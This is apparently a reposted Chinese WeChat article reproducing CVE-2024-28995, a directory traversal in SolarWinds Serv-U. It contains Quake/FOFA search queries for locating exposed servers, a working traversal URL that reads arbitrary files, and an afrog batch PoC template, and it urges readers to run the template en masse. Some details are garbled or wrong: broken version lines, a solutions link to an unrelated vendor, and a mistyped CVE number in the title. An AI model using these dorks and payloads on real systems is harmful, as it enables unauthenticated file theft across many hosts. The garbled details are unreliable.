1. 漏洞描述
SolarWinds 是一家提供广泛的 IT 管理和网络管理软件解决方案的公司。SolarWinds 的产品被设计用于监控和管理网络设备、服务器、应用程序和网络流量等。Serv-U 是 SolarWinds 提供的一款 FTP(文件传输协议)服务器软件,它允许用户在 Windows 、Linux 系统上设置和管理 FTP 服务。Serv-U 提供了多种功能,以确保文件传输的安全性、效率和灵活性。
SolarWinds Serv-U 目录遍历漏洞(CVE-2024-28995),SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。
2. 影响版本
15.4.2 Hotfix 1 =
SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1
15.4.2 Hotfix 1 =
3. 搜索语法
3.1. quake语法:
(app: "Serv-U-FTP" OR favicon: "8a6dacffcd355924b6bc51b39bced51f" OR favicon: "2815c2c03732de3af5d4387f87efeb81")
3.2. fofa语法:
(product="SolarWinds-Serv-U-FTP" || icon_hash="-494622145" || icon_hash="812385209")
4. 实例复现
https://xxx.xxx.xxx/
https://xxx.xxx.xxx/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt
5. 批量poc
这里给各位师傅准备好了afrog的批量刷取脚本,大家快去上分吧!!
id: CVE-2024-28995
info:
name: CVE-2024-28995
author: fkalis
severity: high
verified: true
description: |
CVE-2024-28995
affected: CVE-2024-28995
solutions: https://www.weaver.com.cn/cs/securityDownload.asp#
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995?ref=thestack.technology
tags: CVE-2024-28995
rules:
r0:
request:
method: GET
path: /?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt
expression: |
response.status == 200 && response.body.bcontains(b'All rights reserved.') && response.body.bcontains(b'Serv-U File Server')
expression: r0()
6. 今晚开奖!!!
原文始发于微信公众号(fkalis):SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-2899)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论